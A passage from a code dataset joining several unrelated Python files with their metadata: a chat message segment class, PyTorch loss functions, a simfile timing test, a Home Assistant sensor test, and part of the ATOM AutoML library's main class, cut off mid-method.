isinstance(other, MessageSegment):\n return False\n return self.type == other.type and self.data == other.data\n\n @staticmethod\n def text(text: str):\n return MessageSegment(type='text', data={'text': text})\n\n @staticmethod\n def emoji(id_: int):\n return MessageSegment(type='emoji', data={'id': str(id_)})\n\n @staticmethod\n def face(id_: int):\n return MessageSegment(type='face', data={'id': str(id_)})\n\n @staticmethod\n def image(file: str):\n return MessageSegment(type='image', data={'file': file})\n\n @staticmethod\n def record(file: str, magic: bool = False):\n return MessageSegment(type='record',\n data={'file': file, 'magic': _b2s(magic)})\n\n @staticmethod\n def at(user_id: int):\n return MessageSegment(type='at', data={'qq': str(user_id)})\n\n @staticmethod\n def rps():\n return MessageSegment(type='rps')\n\n @staticmethod\n def dice():\n return MessageSegment(type='dice')\n\n @staticmethod\n def shake():\n return MessageSegment(type='shake')\n\n @staticmethod\n def anonymous(ignore_failure: bool = False):\n return MessageSegment(type='anonymous',\n data={'ignore': _b2s(ignore_failure)})\n\n @staticmethod\n def share(url: str, title: str, content: str = '', image_url: str = ''):\n return MessageSegment(type='share', data={\n 'url': url,\n 'title': title,\n 'content': content,\n 'image': image_url\n })\n\n @staticmethod\n def contact_user(id_: int):\n return MessageSegment(type='contact',\n data={'type': 'qq', 'id': str(id_)})\n\n @staticmethod\n def contact_group(id_: int):\n return MessageSegment(type='contact',\n data={'type': 'group', 'id': str(id_)})\n\n @staticmethod\n def location(latitude: float, longitude: float, title: str = '',\n content: str = ''):\n return MessageSegment(type='location', data={\n 'lat': str(latitude),\n 'lon': str(longitude),\n 'title': title,\n 'content': content\n })\n\n @staticmethod\n def music(type_: str, id_: int):\n return MessageSegment(type='music',\n data={'type': type_, 'id': str(id_)})\n\n @staticmethod\n def music_custom(url: str, audio_url: str, title: str, content: str = '',\n image_url: str = ''):\n return MessageSegment(type='music', data={\n 'type': 'custom',\n 'url': url,\n 'audio': audio_url,\n 'title': title,\n 'content': content,\n 'image': image_url\n })\n\n\nclass Message(list):\n def __init__(self, msg: Any = None, *args, **kwargs):\n super().__init__(*args, **kwargs)\n try:\n if isinstance(msg, (list, str)):\n self.extend(msg)\n elif isinstance(msg, dict):\n self.append(msg)\n return\n except:\n pass\n raise ValueError('the msg argument is not recognizable')\n\n @staticmethod\n def _split_iter(msg_str: str) -> Iterable[MessageSegment]:\n def iter_function_name_and_extra() -> Iterable[Tuple[str, str]]:\n text_begin = 0\n for cqcode in re.finditer(r'\\[CQ:(?P[a-zA-Z0-9-_.]+)'\n r'(?P'\n r'(?:,[a-zA-Z0-9-_.]+=?[^,\\]]*)*'\n r'),?\\]',\n msg_str):\n yield 'text', unescape(\n msg_str[text_begin:cqcode.pos + cqcode.start()])\n text_begin = cqcode.pos + cqcode.end()\n yield cqcode.group('type'), cqcode.group('params').lstrip(',')\n yield 'text', unescape(msg_str[text_begin:])\n\n for function_name, extra in iter_function_name_and_extra():\n if function_name == 'text':\n if extra:\n # only yield non-empty text segment\n yield MessageSegment(type=function_name,\n data={'text': extra})\n else:\n data = {k: v for k, v in map(\n lambda x: x.split('=', maxsplit=1),\n filter(lambda x: x, (x.lstrip() for x in extra.split(',')))\n )}\n yield MessageSegment(type=function_name, data=data)\n\n def __str__(self):\n return ''.join((str(seg) for seg in self))\n\n def __add__(self, other: Any):\n result = Message(self)\n try:\n if isinstance(other, Message):\n result.extend(other)\n elif isinstance(other, MessageSegment):\n result.append(other)\n elif isinstance(other, list):\n result.extend(map(lambda d: MessageSegment(d), other))\n elif isinstance(other, dict):\n result.append(MessageSegment(other))\n elif isinstance(other, str):\n result.extend(Message._split_iter(other))\n return result\n except:\n pass\n raise ValueError('the addend is not a valid message')\n\n def append(self, obj: Any) -> None:\n try:\n if isinstance(obj, MessageSegment):\n if self and self[-1].type == 'text' and obj.type == 'text':\n self[-1].data['text'] += obj.data['text']\n elif obj.type != 'text' or obj.data['text'] or not self:\n super().append(obj)\n else:\n self.append(MessageSegment(obj))\n return\n except:\n pass\n raise ValueError('the object is not a valid message segment')\n\n def extend(self, msg: Any) -> None:\n try:\n if isinstance(msg, str):\n msg = self._split_iter(msg)\n\n for seg in msg:\n self.append(seg)\n return\n except:\n pass\n raise ValueError('the object is not a valid message')\n\n def reduce(self) -> None:\n \"\"\"\n Remove redundant segments.\n\n Since this class is implemented based on list,\n this method may require O(n) time.\n \"\"\"\n idx = 0\n while idx < len(self):\n if idx > 0 and \\\n self[idx - 1].type == 'text' and self[idx].type == 'text':\n self[idx - 1].data['text'] += self[idx].data['text']\n del self[idx]\n else:\n idx += 1\n\n def extract_plain_text(self, reduce: bool = False) -> str:\n \"\"\"\n Extract text segments from the message, joined by single space.\n\n :param reduce: reduce the message before extracting\n :return: the joined string\n \"\"\"\n if reduce:\n self.reduce()\n\n result = ''\n for seg in self:\n if seg.type == 'text':\n result += ' ' + seg.data['text']\n if result:\n result = result[1:]\n return result\n","sub_path":"aiocqhttp/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":9329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"275840798","text":"import torch\r\nimport torch.nn as nn\r\nfrom torch.nn import functional as F\r\nimport numpy as np\r\n\r\n\r\nclass CrossEntropy(nn.Module):\r\n def __init__(self, para_dict=None):\r\n super(CrossEntropy, self).__init__()\r\n\r\n def forward(self, output, target):\r\n loss = F.cross_entropy(output, target)\r\n return loss\r\n\r\n\r\nclass FocalLoss(nn.Module):\r\n def __init__(self, para_dict=None):\r\n super(FocalLoss, self).__init__()\r\n cfg = para_dict[\"cfg\"]\r\n # self.gamma = cfg.LOSS.FOCAL.GAMMA\r\n self.gamma = 1\r\n assert self.gamma >= 0\r\n\r\n def focal_loss(self, input_values):\r\n \"\"\"Computes the focal loss\"\"\"\r\n p = torch.exp(-input_values)\r\n loss = (1 - p) ** self.gamma * input_values\r\n return loss.mean()\r\n\r\n def forward(self, input, target):\r\n return self.focal_loss(F.cross_entropy(input, target, reduction='none'))\r\n\r\n\r\n# The LDAMLoss class is copied from the official PyTorch implementation in LDAM (https://github.com/kaidic/LDAM-DRW).\r\nclass LDAMLoss(nn.Module):\r\n def __init__(self, para_dict=None):\r\n super(LDAMLoss, self).__init__()\r\n s = 30\r\n self.num_class_list = para_dict[\"num_class_list\"]\r\n self.device = para_dict[\"device\"]\r\n\r\n cfg = para_dict[\"cfg\"]\r\n max_m = cfg.LOSS.LDAM.MAX_MARGIN\r\n m_list = 1.0 / np.sqrt(np.sqrt(self.num_class_list))\r\n m_list = m_list * (max_m / np.max(m_list))\r\n m_list = torch.FloatTensor(m_list).to(self.device)\r\n self.m_list = m_list\r\n assert s > 0\r\n self.s = s\r\n\r\n def forward(self, x, target):\r\n index = torch.zeros_like(x, dtype=torch.uint8)\r\n index.scatter_(1, target.data.view(-1, 1), 1)\r\n\r\n index_float = index.type(torch.FloatTensor)\r\n index_float = index_float.to(self.device)\r\n batch_m = torch.matmul(self.m_list[None, :], index_float.transpose(0, 1))\r\n batch_m = batch_m.view((-1, 1))\r\n x_m = x - batch_m\r\n\r\n output = torch.where(index, x_m, x)\r\n\r\n return F.cross_entropy(self.s * output, target)\r\n\r\n\r\n","sub_path":"lib/loss/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"529992745","text":"import unittest\n\nfrom .helpers import *\nfrom .. import *\nfrom ..timed import timed_note_iterator\nfrom ...timing import Beat, TimingData\n\n\nclass TestTimedNoteStream(unittest.TestCase):\n def test_timed_note_stream(self):\n timed_notes = list(timed_note_iterator(\n note_data=NoteData.from_chart(testing_chart()),\n timing_data=TimingData.from_simfile(testing_simfile()),\n ))\n\n self.assertAlmostEqual(4.000, timed_notes[0].time)\n self.assertEqual(\n Note(beat=Beat(16,4), column=0, note_type=NoteType.TAP),\n timed_notes[0].note\n )\n self.assertAlmostEqual(4.250, timed_notes[1].time)\n self.assertEqual(\n Note(beat=Beat(18,4), column=2, note_type=NoteType.TAP),\n timed_notes[1].note\n )\n self.assertAlmostEqual(9.000, timed_notes[-1].time)\n self.assertEqual(\n Note(beat=Beat(48,4), column=3, note_type=NoteType.TAIL),\n timed_notes[-1].note\n )\n","sub_path":"simfile/notes/tests/test_timed.py","file_name":"test_timed.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"127420179","text":"\"\"\"The tests for the Sure Petcare binary sensor platform.\"\"\"\nfrom homeassistant.components.surepetcare.const import DOMAIN\nfrom homeassistant.setup import async_setup_component\n\nfrom . import MOCK_API_DATA, MOCK_CONFIG, _patch_sensor_setup\n\nEXPECTED_ENTITY_IDS = {\n \"binary_sensor.pet_flap_pet_flap_connectivity\": \"household-id-13576-connectivity\",\n \"binary_sensor.pet_flap_cat_flap_connectivity\": \"household-id-13579-connectivity\",\n \"binary_sensor.feeder_feeder_connectivity\": \"household-id-12345-connectivity\",\n \"binary_sensor.pet_pet\": \"household-id-24680\",\n \"binary_sensor.hub_hub\": \"household-id-hub-id\",\n}\n\n\nasync def test_binary_sensors(hass, surepetcare) -> None:\n \"\"\"Test the generation of unique ids.\"\"\"\n instance = surepetcare.return_value\n instance.data = MOCK_API_DATA\n instance.get_data.return_value = MOCK_API_DATA\n\n with _patch_sensor_setup():\n assert await async_setup_component(hass, DOMAIN, MOCK_CONFIG)\n await hass.async_block_till_done()\n\n entity_registry = await hass.helpers.entity_registry.async_get_registry()\n state_entity_ids = hass.states.async_entity_ids()\n\n for entity_id, unique_id in EXPECTED_ENTITY_IDS.items():\n assert entity_id in state_entity_ids\n entity = entity_registry.async_get(entity_id)\n assert entity.unique_id == unique_id\n","sub_path":"tests/components/surepetcare/test_binary_sensor.py","file_name":"test_binary_sensor.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"275439208","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"Automated Tool for Optimized Modelling (ATOM).\r\n\r\nAuthor: Mavs\r\nDescription: Module containing the ATOM class.\r\n\r\n\"\"\"\r\n\r\n# Standard packages\r\nimport os\r\nimport contextlib\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom scipy import stats\r\nfrom copy import deepcopy\r\nfrom typeguard import typechecked\r\nfrom typing import Union, Optional, Any\r\n\r\n# Own modules\r\nfrom .branch import Branch\r\nfrom .basepredictor import BasePredictor\r\nfrom .basetrainer import BaseTrainer\r\nfrom .basetransformer import BaseTransformer\r\nfrom .nlp import TextCleaner, Tokenizer, Normalizer, Vectorizer\r\nfrom .pipeline import Pipeline\r\nfrom .data_cleaning import (\r\n DropTransformer,\r\n FuncTransformer,\r\n Cleaner,\r\n Gauss,\r\n Scaler,\r\n Imputer,\r\n Encoder,\r\n Pruner,\r\n Balancer,\r\n)\r\nfrom .feature_engineering import FeatureGenerator, FeatureSelector\r\nfrom .training import (\r\n DirectClassifier,\r\n DirectRegressor,\r\n SuccessiveHalvingClassifier,\r\n SuccessiveHalvingRegressor,\r\n TrainSizingClassifier,\r\n TrainSizingRegressor,\r\n)\r\nfrom .models import CustomModel\r\nfrom .plots import ATOMPlotter\r\nfrom .utils import (\r\n SCALAR, SEQUENCE_TYPES, X_TYPES, Y_TYPES, DISTRIBUTIONS, flt,\r\n lst, divide, infer_task, check_method, check_scaling,\r\n check_multidimensional, names_from_estimator, variable_return,\r\n delete, custom_transform, add_transformer, method_to_log,\r\n composed, crash, CustomDict,\r\n)\r\n\r\n\r\nclass ATOM(BasePredictor, ATOMPlotter):\r\n \"\"\"ATOM base class.\r\n\r\n The ATOM class is a convenient wrapper for all data cleaning,\r\n feature engineering and trainer estimators in this package.\r\n Provide the dataset to the class, and apply all transformations\r\n and model management from here.\r\n\r\n Warning: This class should not be called directly. Use descendant\r\n classes ATOMClassifier or ATOMRegressor instead.\r\n\r\n \"\"\"\r\n\r\n @composed(crash, method_to_log)\r\n def __init__(self, arrays, y, shuffle, n_rows, test_size):\r\n self.shuffle = shuffle\r\n self.n_rows = n_rows\r\n self.test_size = test_size\r\n self.missing = [\"\", \"?\", \"NA\", \"nan\", \"NaN\", \"None\", \"inf\"]\r\n\r\n # Branching attributes\r\n self._branches = {\"og\": Branch(self, \"og\"), \"master\": Branch(self, \"master\")}\r\n self._current = \"master\" # Main branch\r\n\r\n # Training attributes\r\n self._models = CustomDict()\r\n self._metric = CustomDict()\r\n self.errors = {}\r\n\r\n self.log(\"<< ================== ATOM ================== >>\", 1)\r\n\r\n # Prepare the provided data\r\n self.branch.data, self.branch.idx = self._get_data_and_idx(arrays, y=y)\r\n\r\n # Attach the data to the original branch\r\n self.og.data = self.branch.data.copy(deep=True)\r\n self.og.idx = self.branch.idx.copy()\r\n\r\n # Save the test_size fraction for use during training\r\n self._test_size = self.branch.idx[1] / len(self.dataset)\r\n\r\n self.task = infer_task(self.y, goal=self.goal)\r\n self.log(f\"Algorithm task: {self.task}.\", 1)\r\n if self.n_jobs > 1:\r\n self.log(f\"Parallel processing with {self.n_jobs} cores.\", 1)\r\n\r\n # Assign mapping\r\n try: # Can fail if str and NaN in target column\r\n classes = sorted(self.y.unique())\r\n except TypeError:\r\n classes = self.y.unique()\r\n self.branch.mapping = {str(value): value for value in classes}\r\n\r\n self.log('', 1) # Add empty rows around stats for cleaner look\r\n self.stats(1)\r\n self.log('', 1)\r\n\r\n def __repr__(self):\r\n out = f\"{self.__class__.__name__}\"\r\n out += f\"\\n --> Branches:\"\r\n if len(self._branches) - 1 == 1:\r\n out += f\" {self._current}\"\r\n else:\r\n for branch in [b for b in self._branches if b != \"og\"]:\r\n out += f\"\\n >>> {branch}{' !' if branch == self._current else ''}\"\r\n out += f\"\\n --> Models: {', '.join(lst(self.models)) if self.models else None}\"\r\n out += f\"\\n --> Metric: {', '.join(lst(self.metric)) if self.metric else None}\"\r\n out += f\"\\n --> Errors: {len(self.errors)}\"\r\n\r\n return out\r\n\r\n def __len__(self):\r\n return len(self.pipeline)\r\n\r\n def __iter__(self):\r\n yield from self.pipeline.values\r\n\r\n def __contains__(self, item):\r\n return item in self.dataset\r\n\r\n def __getitem__(self, item):\r\n if isinstance(item, int):\r\n return self.pipeline.iloc[item] # Transformer from pipeline\r\n elif isinstance(item, str):\r\n return self.dataset[item] # Column from dataset\r\n else:\r\n raise TypeError(\r\n f\"'{self.__class__.__name__}' object is only\"\r\n \" subscriptable with types int or str.\"\r\n )\r\n\r\n # Utility properties =========================================== >>\r\n\r\n @BasePredictor.branch.setter\r\n @typechecked\r\n def branch(self, branch: str):\r\n if not branch:\r\n raise ValueError(\"Can't create a branch with an empty name!\")\r\n elif branch.lower() == \"og\":\r\n raise ValueError(\r\n \"This name is reserved for internal purposes. \"\r\n \"Choose a different name for the branch.\"\r\n )\r\n elif branch.lower() in self._branches:\r\n self._current = branch.lower()\r\n self.log(f\"Switched to branch {branch}.\", 1)\r\n else:\r\n # Branch can be created from current or another\r\n if \"_from_\" in branch:\r\n new_branch, from_branch = branch.lower().split(\"_from_\")\r\n else:\r\n new_branch, from_branch = branch.lower(), self._current\r\n\r\n if from_branch not in self._branches:\r\n raise ValueError(\r\n \"The selected branch to split from does not exist! Print \"\r\n \"atom.branch for an overview of the available branches.\"\r\n )\r\n\r\n self._branches[new_branch] = Branch(self, new_branch, parent=from_branch)\r\n self._current = new_branch\r\n self.log(f\"New branch {self._current} successfully created!\", 1)\r\n\r\n @property\r\n def scaled(self):\r\n \"\"\"Whether the feature set is scaled.\"\"\"\r\n if not check_multidimensional(self.X):\r\n est_names = [est.__class__.__name__.lower() for est in self.pipeline]\r\n return check_scaling(self.X) or \"scaler\" in est_names\r\n\r\n @property\r\n def duplicates(self):\r\n \"\"\"Number of duplicate rows in the dataset.\"\"\"\r\n if not check_multidimensional(self.X):\r\n return self.dataset.duplicated().sum()\r\n\r\n @property\r\n def nans(self):\r\n \"\"\"Columns with the number of missing values in them.\"\"\"\r\n if not check_multidimensional(self.X):\r\n nans = self.dataset.replace(self.missing + [np.inf, -np.inf], np.NaN)\r\n nans = nans.isna().sum()\r\n return nans[nans > 0]\r\n\r\n @property\r\n def n_nans(self):\r\n \"\"\"Number of samples containing missing values.\"\"\"\r\n if not check_multidimensional(self.X):\r\n nans = self.dataset.replace(self.missing + [np.inf, -np.inf], np.NaN)\r\n nans = nans.isna().sum(axis=1)\r\n return len(nans[nans > 0])\r\n\r\n @property\r\n def numerical(self):\r\n \"\"\"Names of the numerical features in the dataset.\"\"\"\r\n if not check_multidimensional(self.X):\r\n return list(self.X.select_dtypes(include=[\"number\"]).columns)\r\n\r\n @property\r\n def n_numerical(self):\r\n \"\"\"Number of numerical features in the dataset.\"\"\"\r\n if not check_multidimensional(self.X):\r\n return len(self.numerical)\r\n\r\n @property\r\n def categorical(self):\r\n \"\"\"Names of the categorical features in the dataset.\"\"\"\r\n if not check_multidimensional(self.X):\r\n return list(self.X.select_dtypes(exclude=[\"number\"]).columns)\r\n\r\n @property\r\n def n_categorical(self):\r\n \"\"\"Number of categorical features in the dataset.\"\"\"\r\n if not check_multidimensional(self.X):\r\n return len(self.categorical)\r\n\r\n @property\r\n def outliers(self):\r\n \"\"\"Columns in training set with amount of outlier values.\"\"\"\r\n if not check_multidimensional(self.X):\r\n num_and_target = self.dataset.select_dtypes(include=[\"number\"]).columns\r\n z_scores = stats.zscore(self.train[num_and_target], nan_policy=\"propagate\")\r\n srs = pd.Series((np.abs(z_scores) > 3).sum(axis=0), index=num_and_target)\r\n return srs[srs > 0]\r\n\r\n @property\r\n def n_outliers(self):\r\n \"\"\"Number of samples in the training set containing outliers.\"\"\"\r\n if not check_multidimensional(self.X):\r\n num_and_target = self.dataset.select_dtypes(include=[\"number\"]).columns\r\n z_scores = stats.zscore(self.train[num_and_target], nan_policy=\"propagate\")\r\n return len(np.where((np.abs(z_scores) > 3).any(axis=1))[0])\r\n\r\n @property\r\n def classes(self):\r\n \"\"\"Distribution of target classes per data set.\"\"\"\r\n return pd.DataFrame(\r\n {\r\n \"dataset\": self.y.value_counts(sort=False, dropna=False),\r\n \"train\": self.y_train.value_counts(sort=False, dropna=False),\r\n \"test\": self.y_test.value_counts(sort=False, dropna=False),\r\n },\r\n index=self.mapping.values(),\r\n ).fillna(0).astype(int) # If 0 counts, it doesnt return the row (gets a NaN)\r\n\r\n @property\r\n def n_classes(self):\r\n \"\"\"Number of classes in the target column.\"\"\"\r\n return len(self.y.unique())\r\n\r\n # Utility methods =============================================== >>\r\n\r\n @composed(crash, method_to_log)\r\n def status(self):\r\n \"\"\"Get an overview of atom's status.\"\"\"\r\n self.log(str(self))\r\n\r\n @composed(crash, method_to_log)\r\n def reset(self):\r\n \"\"\"Reset the instance to it's initial state.\r\n\r\n Deletes all branches and models. The dataset is also reset\r\n to its form after initialization.\r\n\r\n \"\"\"\r\n # Delete all models and branches\r\n delete(self, self._get_models(None))\r\n for name in [b for b in self._branches if b != \"og\"]:\r\n self._branches.pop(name)\r\n\r\n # Re-create the master branch from original\r\n self._branches[\"master\"] = Branch(self, \"master\", parent=\"og\")\r\n self._current = \"master\"\r\n\r\n self.log(\"The instance is successfully reset!\", 1)\r\n\r\n @composed(crash, method_to_log)\r\n def stats(self, _vb: int = -2):\r\n \"\"\"Print basic information about the dataset.\r\n\r\n Parameters\r\n ----------\r\n _vb: int, optional (default=-2)\r\n Internal parameter to always print if called by user.\r\n\r\n \"\"\"\r\n self.log(\"Dataset stats ====================== >>\", _vb)\r\n self.log(f\"Shape: {self.shape}\", _vb)\r\n\r\n if not check_multidimensional(self.X):\r\n nans = self.nans.sum()\r\n n_categorical = self.n_categorical\r\n outliers = self.outliers.sum()\r\n duplicates = self.dataset.duplicated().sum()\r\n\r\n self.log(f\"Scaled: {self.scaled}\", _vb)\r\n if self.nans.sum():\r\n p_nans = round(100. * nans / self.dataset.size, 1)\r\n self.log(f\"Missing values: {nans} ({p_nans}%)\", _vb)\r\n if n_categorical:\r\n p_cat = round(100. * n_categorical / self.n_features, 1)\r\n self.log(f\"Categorical features: {n_categorical} ({p_cat}%)\", _vb)\r\n if outliers:\r\n p_out = round(100. * outliers / self.train.size, 1)\r\n self.log(f\"Outlier values: {outliers} ({p_out}%)\", _vb)\r\n if duplicates:\r\n p_dup = round(100. * duplicates / len(self.dataset), 1)\r\n self.log(f\"Duplicate samples: {duplicates} ({p_dup}%)\", _vb)\r\n\r\n self.log(\"---------------------------------------\", _vb)\r\n self.log(f\"Train set size: {len(self.train)}\", _vb)\r\n self.log(f\"Test set size: {len(self.test)}\", _vb)\r\n\r\n # Print count and balance of classes\r\n if self.task != \"regression\":\r\n self.log(\"---------------------------------------\", _vb + 1)\r\n cls = self.classes # Calculate class distribution only once\r\n func = lambda i, col: f\"{i} ({divide(i, min(cls[col])):.1f})\"\r\n df = pd.DataFrame(\r\n {col: [func(v, col) for v in cls[col]] for col in cls},\r\n index=self.mapping.values(),\r\n )\r\n self.log(df.to_markdown(), _vb + 1)\r\n\r\n @composed(crash, typechecked)\r\n def distribution(self, column: Union[int, str] = 0):\r\n \"\"\"Get statistics on a column's distribution.\r\n\r\n Compute the KS-statistic for various distributions against\r\n a column in the dataset.\r\n\r\n Parameters\r\n ----------\r\n column: int or str, optional (default=0)\r\n Index or name of the column to get the statistics from.\r\n Only numerical columns are accepted.\r\n\r\n Returns\r\n -------\r\n df: pd.DataFrame\r\n Dataframe with the statistic results.\r\n\r\n \"\"\"\r\n if isinstance(column, int):\r\n column = self.columns[column]\r\n\r\n if column in self.categorical:\r\n raise ValueError(\r\n \"Invalid value for the column parameter. Column should \"\r\n f\"be numerical, got categorical column {column}.\"\r\n )\r\n\r\n # Drop missing values from the column before fitting\r\n X = self[column].replace(self.missing + [np.inf, -np.inf], np.NaN).dropna()\r\n\r\n df = pd.DataFrame(columns=[\"ks\", \"p_value\"])\r\n for dist in DISTRIBUTIONS:\r\n # Get KS-statistic with fitted distribution parameters\r\n param = getattr(stats, dist).fit(X)\r\n stat = stats.kstest(X, dist, args=param)\r\n\r\n # Add as row to the dataframe\r\n df.loc[dist] = {\"ks\": round(stat[0], 4), \"p_value\": round(stat[1], 4)}\r\n\r\n return df.sort_values([\"ks\"])\r\n\r\n @composed(crash, typechecked)\r\n def report(\r\n self,\r\n dataset: str = \"dataset\",\r\n n_rows: Optional[Union[int, float]] = None, # float for 1e3...\r\n filename: Optional[str] = None,\r\n ):\r\n \"\"\"Create an extensive profile analysis report of the data.\r\n\r\n The profile report is rendered in HTML5 and CSS3. Note that\r\n this method can be slow for n_rows>10k.\r\n\r\n Parameters\r\n ----------\r\n dataset: str, optional (default=\"dataset\")\r\n Data set to get the report from.\r\n\r\n n_rows: int or None, optional (default=None)\r\n Number of (randomly picked) rows in to process. None for\r\n all rows.\r\n\r\n filename: str or None, optional (default=None)\r\n Name to save the file with (as .html). None to not save\r\n anything.\r\n\r\n Returns\r\n -------\r\n profile: ProfileReport\r\n Created report object.\r\n\r\n \"\"\"\r\n from pandas_profiling import ProfileReport\r\n\r\n self.log(\"Creating profile report...\", 1)\r\n\r\n n_rows = getattr(self, dataset).shape[0] if n_rows is None else int(n_rows)\r\n profile = ProfileReport(getattr(self, dataset).sample(n_rows))\r\n\r\n if filename:\r\n if not filename.endswith(\".html\"):\r\n filename = filename + \".html\"\r\n profile.to_file(filename)\r\n self.log(\"Report saved successfully!\", 1)\r\n\r\n return profile\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def transform(\r\n self,\r\n X: X_TYPES,\r\n y: Y_TYPES = None,\r\n pipeline: Optional[Union[bool, SEQUENCE_TYPES]] = None,\r\n verbose: Optional[int] = None,\r\n ):\r\n \"\"\"Transform new data through all transformers in the branch.\r\n\r\n By default, transformers that are applied on the training\r\n set only are not used during the transformations. Use the\r\n `pipeline` parameter to customize this behaviour.\r\n\r\n Parameters\r\n ----------\r\n X: dict, list, tuple, np.ndarray or pd.DataFrame\r\n Feature set with shape=(n_samples, n_features).\r\n\r\n y: int, str, sequence or None, optional (default=None)\r\n - If None: y is ignored in the transformers.\r\n - If int: Index of the target column in X.\r\n - If str: Name of the target column in X.\r\n - Else: Target column with shape=(n_samples,).\r\n\r\n Feature set with shape=(n_samples, n_features).\r\n\r\n pipeline: bool, sequence or None, optional (default=None)\r\n Transformers to use on the data before predicting.\r\n - If None: Only transformers that are applied on the\r\n whole dataset are used.\r\n - If False: Don't use any transformers.\r\n - If True: Use all transformers in the pipeline.\r\n - If sequence: Transformers to use, selected by their\r\n index in the pipeline.\r\n\r\n verbose: int or None, optional (default=None)\r\n Verbosity level for the transformers. If None, it uses the\r\n transformer's own verbosity.\r\n\r\n Returns\r\n -------\r\n X: pd.DataFrame\r\n Transformed feature set.\r\n\r\n y: pd.Series\r\n Transformed target column. Only returned if provided.\r\n\r\n \"\"\"\r\n if pipeline is None:\r\n pipeline = [i for i, est in enumerate(self.pipeline) if not est.train_only]\r\n elif pipeline is False:\r\n pipeline = []\r\n elif pipeline is True:\r\n pipeline = list(range(len(self.pipeline)))\r\n\r\n for idx, est in enumerate(self.pipeline):\r\n if idx in pipeline:\r\n X, y = custom_transform(self, est, self.branch, (X, y), verbose)\r\n\r\n return variable_return(X, y)\r\n\r\n def automl(self, **kwargs):\r\n \"\"\"Use AutoML to search for an optimized pipeline.\r\n\r\n Uses the TPOT package to perform an automated search of\r\n transformers and a final estimator that maximizes a metric\r\n on the dataset. The resulting transformations and estimator\r\n are merged with atom's pipeline. The tpot instance can be\r\n accessed through the `tpot` attribute.\r\n\r\n Parameters\r\n ----------\r\n **kwargs\r\n Keyword arguments for tpot's classifier/regressor.\r\n\r\n \"\"\"\r\n from tpot import TPOTClassifier, TPOTRegressor\r\n\r\n check_method(self, \"automl\")\r\n # Define the scoring parameter\r\n if self._metric and not kwargs.get(\"scoring\"):\r\n kwargs[\"scoring\"] = self._metric[0]\r\n elif kwargs.get(\"scoring\"):\r\n metric_ = BaseTrainer._prepare_metric([kwargs[\"scoring\"]])\r\n if not self._metric:\r\n self._metric = metric_ # Update the pipeline's metric\r\n elif metric_[0].name != self.metric[0]:\r\n raise ValueError(\r\n \"Invalid value for the scoring parameter! The scoring \"\r\n \"should be equal to the primary metric in the pipeline. \"\r\n f\"Expected {self.metric[0]}, got {metric_[0].name}.\"\r\n )\r\n\r\n kwargs = dict(\r\n n_jobs=kwargs.pop(\"n_jobs\", self.n_jobs),\r\n verbosity=kwargs.pop(\"verbosity\", self.verbose),\r\n random_state=kwargs.pop(\"random_state\", self.random_state),\r\n **kwargs,\r\n )\r\n if self.goal.startswith(\"class\"):\r\n self.branch.tpot = TPOTClassifier(**kwargs)\r\n else:\r\n self.branch.tpot = TPOTRegressor(**kwargs)\r\n\r\n self.log(\"Fitting automl algorithm...\", 1)\r\n\r\n self.tpot.fit(self.X_train, self.y_train)\r\n\r\n self.log(\"\\nMerging automl results with atom...\", 1)\r\n\r\n # A pipeline could consist of just a single estimator\r\n if len(self.tpot.fitted_pipeline_) > 1:\r\n for name, est in self.tpot.fitted_pipeline_[:-1].named_steps.items():\r\n add_transformer(self, est)\r\n\r\n # Add the final estimator as a model to atom\r\n est = self.tpot.fitted_pipeline_[-1]\r\n est.acronym, est.fullname = names_from_estimator(self, est)\r\n model = CustomModel(self, estimator=est)\r\n model.estimator = model.est\r\n\r\n # Save metric scores on complete training and test set\r\n model.metric_train = flt([\r\n metric(model.estimator, self.X_train, self.y_train)\r\n for metric in self._metric\r\n ])\r\n model.metric_test = flt([\r\n metric(model.estimator, self.X_test, self.y_test)\r\n for metric in self._metric\r\n ])\r\n\r\n self._models.update({model.name: model})\r\n self.log(f\"Adding model {model.fullname} ({model.name}) to the pipeline...\", 1)\r\n\r\n @composed(crash, method_to_log, typechecked)\r\n def save_data(self, filename: str = \"auto\", dataset: str = \"dataset\"):\r\n \"\"\"Save the data in the current branch to a csv file.\r\n\r\n Parameters\r\n ----------\r\n filename: str, optional (default=\"auto\")\r\n Name of the file. Use \"auto\" for automatic naming.\r\n\r\n dataset: str, optional (default=\"dataset\")\r\n Data set to save.\r\n\r\n \"\"\"\r\n if filename.endswith(\"auto\"):\r\n filename = filename.replace(\"auto\", f\"{self.__class__.__name__}_{dataset}\")\r\n if not filename.endswith(\".csv\"):\r\n filename += \".csv\"\r\n\r\n getattr(self, dataset).to_csv(filename, index=False)\r\n self.log(\"Data set saved successfully!\", 1)\r\n\r\n @composed(crash, typechecked)\r\n def export_pipeline(\r\n self,\r\n model: Optional[str] = None,\r\n pipeline: Optional[Union[bool, SEQUENCE_TYPES]] = None,\r\n verbose: Optional[int] = None,\r\n ):\r\n \"\"\"Export atom's pipeline to a sklearn-like Pipeline object.\r\n\r\n Optionally, you can add a model as final estimator. The\r\n returned pipeline is already fitted on the training set.\r\n\r\n Parameters\r\n ----------\r\n model: str or None, optional (default=None)\r\n Name of the model to add as a final estimator to the\r\n pipeline. If the model used feature scaling, the Scaler\r\n is added before the model. If None, only the\r\n transformers are added.\r\n\r\n pipeline: bool, sequence or None, optional (default=None)\r\n Transformers to export.\r\n - If None: Only transformers that are applied on the\r\n whole dataset are exported.\r\n - If False: Don't use any transformers.\r\n - If True: Use all transformers in the pipeline.\r\n - If sequence: Transformers to use, selected by their\r\n index in the pipeline.\r\n\r\n verbose: int or None, optional (default=None)\r\n Verbosity level of the transformers in the pipeline. If\r\n None, it leaves them to their original verbosity.\r\n\r\n Returns\r\n -------\r\n pipeline: Pipeline\r\n Current branch as a sklearn-like Pipeline object.\r\n\r\n \"\"\"\r\n if pipeline is None:\r\n pipeline = [i for i, est in enumerate(self.pipeline) if not est.train_only]\r\n elif pipeline is False:\r\n 